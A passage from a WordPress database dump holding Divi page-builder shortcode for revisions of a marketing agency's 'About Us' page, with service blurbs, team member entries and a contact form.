animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\" alt=\"Creative graphic designing \" title_text=\"Creative graphic designing \"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" hover_enabled=\"0\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field fullwidth_field=\"on\" _builder_version=\"4.5.2\" _module_preset=\"default\" field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" hover_enabled=\"0\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-07 19:25:41','2020-08-07 19:25:41','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/392-revision-v1/',0,'revision','',0),(557,1,'2020-08-07 19:26:06','2020-08-07 19:26:06','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"4.5.2\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/WhyWE.jpg\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\" alt=\"about WhatTheHell?\" title_text=\"whatthehell about us\" parallax=\"on\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Build Brand Equity</h2>\n<p>Our advertising and marketing startegies are aligned towards the core objectives of the business operation of sustainable sales leading to profit and building brand equity as long term asset creation for the businesses.</p>\n<p><span style=\"font-size: 16px;\">There is a need to understand the various phases of businesses &amp; invest in marketing (Sales or Brand Building) in the required proportion. As per the budget of the business we can align our marketing and advertising strategies into aggressive disruptive to guerilla or safe. As the successful advertising and marketing require patience and balancing various market forces to help your business thrust to an upward direction.</span></p>\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"56px||56px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"56px|0px|56px|0px|false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\" hover_enabled=\"0\"]<p><span>With the advent to this digital era, <strong>Unique traffic to your website</strong>, is becoming the key battle point. Targeting the appropriate TG and reaching to them at the right place and the moment can help you earn them for lifetime.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||56px||false|false\" hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"4.5.2\" custom_padding=\"56px||60px||false|false\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>We do not fear trying new stuff and failure (we say learning). Meet the <span>team of professionals enjoying their work and adding value to your project.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\" hover_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Dhiraj Kumar\" position=\"Founder\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard.jpg\" linkedin_url=\"https://www.linkedin.com/in/dhirajwth\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" hover_enabled=\"0\" alt=\"dhiraj kumar founder \" title_text=\"dhiraj kumar whatthehell?\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Christina Foster\" position=\"Creative Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-06.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" hover_enabled=\"0\" locked=\"off\" alt=\"dhiraj kumar founder \" title_text=\"travel-portrait-06\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Jason Wardak\" position=\"Visual Media\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-04.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||56px|||\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" 